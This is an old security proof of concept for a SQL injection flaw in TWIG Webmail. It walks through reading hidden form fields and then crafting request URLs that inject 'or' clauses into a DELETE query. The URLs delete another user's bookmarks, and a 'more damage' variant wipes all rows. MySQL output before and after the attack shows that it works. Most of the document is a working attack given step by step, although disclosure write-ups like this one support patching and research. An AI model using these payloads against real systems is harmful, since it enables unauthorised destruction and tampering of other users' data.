============================================
[Fri Mar  2 21:58:46 JAVT 2001]
TWIG Webmail Unquoted Query String
Proof Of Concept by jenggo <lukiat_private>
============================================
We will try to delete other user mysql data, in this example 'bookmarks'
data. Same action can be made on other data like 'contact' or else ...
You must have existing data before change/deleted others, so add it first.

-------------------------------------------

Login as usuall user account ('eca' in this example)
and go to 'bookmarks' option and choose 'edit'.
View the page source and find the important value:

[cutted to only view string we interested]

<==>
<hr><form action=/webmail/index.php3 method=POST>
<input type=hidden name=twig_sid value="983392539-1-eca">
<input type=hidden name=twig_cid value="983392539-14-eca">
<input type=hidden name=data[id] value=3>
<input type=hidden name=ItemID value=3>
<==>
   <select name=data[groupid]>
      <option value=0 >Unfiled</option>
<==>
<input type=submit name=submitbutton[delete] value="Delete">
<==>

------------------------------------------
NOTE:
The url could be different looks depend on what type of authentication you use.
I use sqltable type, if you use cookies type then the url may *much* longer
than this !
------------------------------------------

Construct the exploit url,

Actual url:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392414-1-eca&twig_cid=983392414-14-eca&ItemID=3

Change it to:
http://192.168.0.18/webmail/index.php3?ts=983392426&twig_sid=983392539-1-eca&twig_cid=983392539-14-eca&ItemID=2&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2

------------------------------------------
NOTE:
we change string: ItemID=3 to ItemID=2
we added string: "&data[groupid]=0&submitbutton[delete]=Delete&data[id]=2%20or%20id%3d2"
                                                                         ~~~~~~~~~~~~~~
                                                                          (this is it)
or for more damage (deleting all data):
http://192.168.0.18/webmail/index.php3?ts=983393006&twig_sid=983393050-1-eca&twig_cid=983393050-14-eca&ItemID=2&data[id]=2%20or%20groupid%3d0&data[groupid]=0&submitbutton[delete]=Delete
            ~~~~~~~~~~~~~~~~~~~
            (this is it)

so the sql query would change from:

DELETE FROM twig_bookmarks WHERE id=3 AND groupid=0 AND username='eca'

to:

DELETE FROM twig_bookmarks WHERE id=2 or id=2 AND groupid=0 AND username='eca'

or for more damage:

DELETE FROM twig_bookmarks WHERE id=2 or groupid=0 AND groupid=0 AND username='eca'

***************RESULT********************

[From mysql console before the exploit]
mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+-------+
| id | username | groupid | url   |
+----+----------+---------+-------+
|  1 | pohenk   |       0 | zzzz  |
|  2 | pohenk   |       0 | yyyyy |
|  3 | eca      |       0 | aaaa  |
+----+----------+---------+-------+
3 rows in set (0.21 sec)

[From mysql console after the exploit]
mysql> select id,username,groupid,url from twig_bookmarks;
+----+----------+---------+--------+
| id | username | groupid | url    |
+----+----------+---------+--------+
|  1 | pohenk   |       0 | zzzz   |
|  3 | eca      |       0 | aaaa   |
+----+----------+---------+--------+
2 rows in set (0.02 sec)

as user 'eca' we could delete/update user 'pohenk' data or else.


[Fri Mar  2 21:58:46 JAVT 2001] - jenggo <lukiat_private>